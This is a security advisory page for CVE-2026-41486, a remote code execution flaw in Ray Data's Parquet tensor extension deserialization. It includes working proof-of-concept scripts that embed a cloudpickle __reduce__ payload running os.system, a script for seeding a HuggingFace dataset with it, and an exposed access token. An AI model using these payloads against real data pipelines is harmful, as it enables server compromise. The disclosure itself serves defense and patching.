Ray Data CVE-2026-41486

HIGH
Code Injection (CWE-94)
2026-04-24 https://github.com/ray-project/ray GHSA-mw35-8rx3-xf9r
Share

Lifecycle Timeline

1
Analysis Generated
Apr 24, 2026 - 16:31 vuln.today

DescriptionNVD

Remote Code Execution via Parquet Arrow Extension Type Deserialization

Summary

Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read.

In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.

Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.

Details

Extension type registration

Ray Data registers three Arrow extension types globally in PyArrow:

python
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))

Registration happens at module load time (__init__.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls __arrow_ext_deserialize__ whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.

The code path to cloudpickle.loads()

All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose __arrow_ext_deserialize__ method (arrow.py:176-179) delegates to subclass methods that ultimately call _deserialize_with_fallback():

python
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
# Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)
# <-- arbitrary code execution
    except Exception:
# Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )

The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, meaning a crafted payload will always be executed before the safe JSON fallback is reached.

For ArrowTensorType, the call chain is:

__arrow_ext_deserialize__(cls, storage_type, serialized)
# arrow.py:176
  -> _arrow_ext_deserialize_cache(serialized, value_type)
# arrow.py:178
    -> _arrow_ext_deserialize_compute(serialized, value_type)
# arrow.py:652
      -> _deserialize_with_fallback(serialized, "shape")
# arrow.py:653
        -> cloudpickle.loads(serialized)
# arrow.py:88  RCE

ArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.

Why the existing mitigation doesn't help

After issue #41314, Ray added check_for_legacy_tensor_type() in parquet_datasource.py:146-170 to block the old PyExtensionType-based tensor types:

python
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
    the extension type extended `PyExtensionType`. However, this base type can expose
    users to arbitrary code execution. To prevent this, we don't load the type by
    default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)

This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently-registered ray.data.arrow_tensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.

Outside Ray's documented threat model

Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.

Impact

  • Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable _deserialize_with_fallback function with cloudpickle.loads() was introduced in commit f6d21db1a4 (PR #54831, July 2025), first released in Ray 2.49.0.
  • Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including ray.data.read_parquet(), pyarrow.parquet.read_table(), pandas.read_parquet(), etc.
  • Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a ray.data.arrow_tensor (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
  • CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
  • Severity: Critical

Attack scenarios

  1. HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with ray.data.arrow_tensor metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
  2. Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
  3. Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.

PoC

We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.

Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).

PoC 1: Local file

Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.

1. Create the Parquet file:

bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT

uv run --with 'cloudpickle,pyarrow' python craft_parquet.py

2. Read it with Ray Data:

bash
rm -f /tmp/ray-tensor-rce-proof

uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"

cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution

PoC 2: End-to-end via HuggingFace

This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.

We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.

Upload script (for reference, this is how we seeded the dataset):

bash
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi

def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))

repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id, repo_type="dataset",
    )
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'

Reproduce (reads the dataset from HuggingFace, no local files needed):

bash
rm -f /tmp/ray-tensor-rce-proof

HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem

ray.data.read_parquet(
    'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
    filesystem=HfFileSystem(),
)
"

cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution via HuggingFace dataset

The token above is read-only. The dataset is private to prevent unintended exposure.

Suggested fix

The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.

  1. Replace cloudpickle.loads() in _deserialize_with_fallback() with json.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate cloudpickle.loads() behind an opt-in environment variable (following the pattern already established with RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE).
  2. Serialize new extension type metadata as JSON by default. json.dumps([3, 224, 224]) carries the same information as cloudpickle.dumps((3, 224, 224)), without the code execution risk.
  3. Add a security note to read_parquet() documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.

Please contact [email protected] with any questions about this disclosure policy or related security research.

AnalysisAI

Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. …

Sign in for full analysis, threat intelligence, and remediation guidance.

RemediationAI

Within 24 hours: Identify all systems running Ray Data 2.49.0-2.54.0 using pip show ray and inventory which versions are in production or development. Within 7 days: Upgrade to Ray Data 2.55.0 or later once available from vendor, or implement immediate network isolation of Ray clusters and disable Parquet ingestion from untrusted sources. …

Sign in for detailed remediation steps.

Share

CVE-2026-41486 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy